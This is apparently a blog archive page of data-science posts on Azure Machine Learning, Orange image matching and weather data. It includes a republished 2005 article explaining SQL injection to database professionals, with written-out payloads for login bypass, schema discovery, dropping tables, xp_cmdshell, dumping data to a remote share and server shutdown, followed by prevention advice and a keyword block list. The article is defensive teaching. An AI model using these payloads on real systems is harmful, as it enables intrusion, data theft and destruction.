Translate

Friday, July 30, 2021

Weather Data for Research

Weather data is important for many research. For example, if you want to predict Sales data, you may want to relate the sales forecasting with weather data such as Rainfall, Temperature or humidity. the challenge would be collecting these data.
Weather History & Data Archive | Weather Underground will provide you with weather data for any place on the map.
These are this month data for the place where I live.

This is the summary data


Daily observations are also available for the month. 







Thursday, July 29, 2021

Detect Modelers with less hair using Orange

Around a few months before, we did few experiments with the Orange tool with different image sets. During this series, we first did the image clustering for images such as birds, trees etc. The same technique was used to identify famous and historical paintings. The next task was more towards the current environment that we are living in, and it is about identifying people who are wearing Masks. Finally, we discussed how to identify modellers without their makeup and we did for both Hollywood and Bollywood
Like makeup another challenging task is to identify these modellers when they have less or no hair. These are the images for those modellers with hair and less or no hair. 


The orange package is much simpler as shown below. 

The Openface embedding was used for both Image Embeddingwhile the cosine distance was for the Neighbors. out of the 19 images, three were dropped by the Image embedding and out of the other 16 images, 11 were correctly matched. 



Article: Recommender Systems for Customer Reviews

We discussed in a previous blog post, how test data is used for recommendation with an example of books.  Having discussed how to use recommender systems, now it is time to discussed How to perform Recommender systems user customer reviews using Azure Machine Learning in this latest article. 

Following is the final output for the recommender system where every user is provided with different products using customer reviews using LDA Technique. 


Azure Experiment is available here.

This is the 18th article of the series and you can find the previous articles from the following list. 

Introduction to Azure Machine Learning using Azure ML Studio
Data Cleansing in Azure Machine Learning
Prediction in Azure Machine Learning
Feature Selection in Azure Machine Learning
Data Reduction Technique: Principal Component Analysis in Azure Machine Learning
Prediction with Regression in Azure Machine Learning
Prediction with Classification in Azure Machine Learning
Comparing models in Azure Machine Learning
Cross Validation in Azure Machine Learning
Clustering in Azure Machine Learning
Tune Model Hyperparameters for Azure Machine Learning models
Time Series Anomaly Detection in Azure Machine Learning
Designing Recommender Systems in Azure Machine Learning
Language Detection in Azure Machine Learning with basic Text Analytics Techniques
Azure Machine Learning: Named Entity Recognition in Text Analytics
Filter based Feature Selection in Text Analytics
Latent Dirichlet Allocation in Text Analytics
Recommender Systems for Customer Reviews

Monday, July 26, 2021

SQLInjection, Basic Hacking Technique



I remember writing this article when the Tsunami hit Sri Lanka in 2004 December and was published in the SQLStandard Magazine in 2005. After more than 15 years of this publication, last month I had to confront another SQL injection incident. Since the Magazine is not available now I thought of publishing this in the Blog. 

------------------------------------------------------------------------------------------------------------

No matter what your role in your database, whether you are a designer, developer, database administrator or QA personnel, the question of security is always on your mind. Even though you have taken enough measures to secure your database, hackers will find new methodologies to hack into your database systems. They are like guerrilla warfighters; one tiny fault is more than enough for them to create a mess. 

SQL Injection is one of the methods used by hackers. I hope that after reading this, you will not try to practice on other websites as you are database professionals. However, I believe that after reading this you will take additional steps to secure your database from SQL Injection hackers. After going through this you will find that there is nothing new, just some techniques, which are still being widely used. Despite the fact that much of this information has been public for some time, I have noticed that there are many websites that are vulnerable to SQL Injection attacks.

Introduction

SQL Injection is an attack based on injecting unauthorized SQL query/commands into some command stream by taking advantage of invalidated input, mainly from websites. Hackers are using “string building” techniques to inject SQL Servers. Many web pages take parameters from users. By using those parameters to build their strings, attackers can send various types of commands and queries to the SQL Server. Usually, these commands are those that might compromise your website.

What you can do using SQL Injection

The following are some of the activities that can be done from SQL Injection. Keep in mind that there are more creative things that can be performed, but this is a shortlist of attacks that have been performed.

• Escape Authorization and logins to websites.

• Obtaining table structures

• Insert / Update / Delete data from tables

• Drop tables, views and even stored procedures

• Retrieving data that would not otherwise be available.

• Run other applications like Notepad, MS Word etc.

• Shutdown of the SQL Server service

Let us look at how these can be done by the attackers. First, let me give you a brief outline of the sample program to demonstrate SQL Injection. I will use one simple table which contains useful information.

I won’t elaborate on anything about the table structure, as we will be able to find it from the SQL Injection attack. The first HTML page (from.html) will accept the user id and the password and pass them to the Login_validation.asp page, in which it validates the user name and the password and shows whether the access right is granted or not. In the Login_validation.asp it will set the connection

to the database and perform a simple select statement with the USERID and PASSWORD to find whether there is a matching record. If any, it will display an error. Otherwise, it will continue from there.

If it is an authorized user, he will type his user name and the password that is assigned to him. But if the user is an attacker, he can perform wonders.

What will happen if he types ‘ OR 1 = 1 in the UserName box. 

For the time being let’s assume that the query is ;

Select * from users where username =’USERNAME’ and password =’PASSWORD’

Now with the above parameters, the query is modified to:

Select * from users where username =’’ OR 1 = 1

With this code, you will return a recordset of data, which will indicate a valid user. This would allow the user to proceed to the next step without denying access, despite the fact that the user did not enter a password.

Next, we will discuss getting information about the table structure. Up to now, we know nothing about the table structure, but if the user types ‘ Having 1 = 1 -– at the username box, you will receive an error message saying,

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Column ‘userinfo.UserId’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

Eureka! You now know that there is a table named USERINFO and it has a field named UserId. Having gotten the first table, you can then type the following at the Name field: ‘ Group by userinfo.userid

Having 1 = 1 –-

Then you will get the following error:

Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Column ‘userinfo.UserName’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

Oops! There is the next field, UserName. Likewise, you can get the rest of the field names in this table with some experimentation. After getting the names of the fields, the next task is to find out the types of the fields. This is a trial-and-error method. By doing the following things, you can get the field types as well.

‘ ; update userinfo set userid = 1 —

If you see an error about type conversions, then you will know whether this is a numeric field or a character field. 

‘ ; drop table userinfo —

What will happen if the user types the above line in the username field? My goodness!!! That is the end of the userinfo table. Similarly, you can inject Insert Update and Delete statements as well, as well as alter table commands.

Retrieving data is the next action we will look at with SQL Injection. After getting information, attackers could change it as they can use the update command. Just imagine if they set to zero the customers’ outstanding balance. That could be the end of your business. 

Things will become even worse if they retrieve the customers’ email addresses and send them e-mails stating that their details are exposed. Customers will lose faith in you, and you will lose business.

These types of attacks also enable the hackers to send spam at their whim.

Suppose an attacker typed the following:

‘ ; EXEC sp_makewebtask “\\12.12.64.4\SQL Injection\user.html”,

“Select * from userInfo” —

at the Username field. It will give you the complete list of the Userinfo in the user.html file, which you can view from your browser.

Performance is a key issue in the SQL Server. As developers and designers, we are very keen on performance, aren’t we? 

Nevertheless, SQL Injection can drop your performance down to a great extent. If somebody can run several other applications on your database server, there is no doubt that performance will go down. In most cases, other applications are not installed in the database server and it will be far better if you can remove other applications from your servers. How can they do this? If they type enough of these commands;

‘ ; exec master..xp_cmdshell ‘winword’ — – MS Word will make an instance

‘ ; exec master..xp_cmdshell ‘Notepad’ — – NotePad will make an instance

These instances will slow down the SQL Server and it will definitely slow down the system performance.

Do you believe that SQL Injection can shut down the SQL Server service? Yes, it can. Entering this at the username prompt will do just that.

‘ ; shutdown –

How to Prevent SQL Injection Attacks

This is the most important part of this article. Limiting the length of the fields is the basic preventive action that you can take. For example, if you allow only 15 characters to the user field you have prevented many SQL Injection attacks. Nevertheless, commands like SHUTDOWN can possibly violate the system by keeping within the limited length.

Input validation is the next best method. As a developer, you should always believe that all the inputs are susceptible to attack and validate them. For numeric fields like age, you can use ISNUMERIC function. For input fields, you can also look for keywords such as SELECT, UPDATE, DELETE, WHERE, INSERT,DROP, UNION, LIKE, HAVING, GROUP, ALTER, TABLE and also punctuations like , , ‘ , “ , — , ) ,;, ( and spaces. A small function I have written can achieve this.

Function string_validation (strVal)

string_validation = True

eliminate_string = Array(“select”, “insert”, “update”, “delete”,

“where”, “drop”, “union”, “like”, “group”, “having”, “,”, “—”, “)”, “char”)

For i = LBound (eliminate_string) To UBound(eliminate_string)

If (InStr(1, strVal, eliminate_string(i), vbTextCompare) <> 0) Then

string_validation = False

End If

Next

End Function

However, you can’t eliminate all the above keywords and punctuations as some may be valid inputs. For example, Michel’s birthday is a valid entry. You can use the following function to eliminate its SQL Injection vulnerability.

Replace (Variable,” ‘ “,” ‘ ‘ “)

There is another important thing to note. Hackers can use CHAR function instead of other punctuations, and you have to validate that function as well. 

Attackers use error messages to get the table structure, as you observed earlier. Therefore, you should use customized error messages rather than displaying default error messages.

For data access, it is advisable to use a stored procedure rather than getting data directly from the table and the views. In calling stored procedures, it is better to implement the ADO command object so that variables are strongly typed.

As you observed in earlier sections, attackers can make use of some stored procedures. Delete those stored procedures that you are not using such as master..xp_cmdshell, xp_startmail,xp_sendmail, sp_makewebtask. However, in most cases, deleting the above-stored procedures will not be possible. In such instances, you can disable the above-stored procedures for the application user access and only allow administrators to execute them.

Another way of preventing SQL Injection is by assigning less privileged users for the application access. From this, we are able to deny rights like the drop operation for a given user.

Conclusion

You can now visualize the importance of preventing SQL Injection attacks. Advise and educate your QA teams about the SQL Injection techniques and have them carry out extensive testing to be sure that your applications are not vulnerable. Implementing a coding standard for developers along with this is an effective way of preventing many forms of SQL Injection attacks.

And this isn’t just for SQL Server. Other databases like Sybase, Oracle, DB2, and even Access are subject to SQL Injection to various degrees. If you support other platforms, you should check them all for these vulnerabilities. Attacks on any of your applications can be very bad for your business.

Monday, July 19, 2021

Research : Loan Data Analysis Using Data Warehouse Techniques

The published research paper to analyse Load Data using Data Warehouse. The following is the start-schema that was designed.


Microsoft Platform was used with SSIS, SSAS and PowerBI to achieve said tasks. Following are some dashboards that were designed from the above data warehouse. 



Saturday, July 17, 2021

Improved Experiment for LDA in Azure Machine Learning

In a previous blog post, we have discussed different Azure Machine Learning experiments. One of those experiments is the Latent Dirichlet Allocation experiment. This experiment is improved with fewer controls where SQL Transformation was used and it has resulted in removing many other controls. 



Wednesday, July 14, 2021

Fuzzy Data Types

In every system, we have designated data types such as int, string, float, bigint to facilitate different user needs. Fuzzy systems are introduced to perform more accuracy for artificial intelligence. Like we see data types in databases, there are different data types for fuzzy systems as well. Following are some of those data types that are identified.  

[Source:  Bahdi A., Chakhar S., Naiija Y., 2005]

Triangular and Trapsodial are the most common Fuzzy data types mostly due to the simplicity of the data types as shown in the following diagram.

Thursday, July 8, 2021

Article: Latent Dirichlet Allocation in Text Analytics

Latent Dirichlet Allocation or LDA is a statistical technique that was introduced in 2003 from a research paper. LDA is used for topic modelling in text documents. LDA is more often analogue to PCA that we covered before. If you remember in PCA, we used to generate a single value for the existing values in a dataset. LDA will generate a topic for documents by analyzing the content of the document. This technique can be used to cluster documents as well which is an important task in text analytics.

Read the full article at Latent Dirichlet Allocation in Text Analytics

This is ToC for the Azure Machine Learning Series.

Introduction to Azure Machine Learning using Azure ML Studio














Azure Machine Learning: Named Entity Recognition in Text Analytics


Sunday, July 4, 2021

Webinar: Building Machine Learning Models With Azure Machine Learning

Join me on this Wednesday to discuss Basics of Building Machine Learning Models with Azure Machine Learning. 

Register At:     https://bit.ly/361PdOt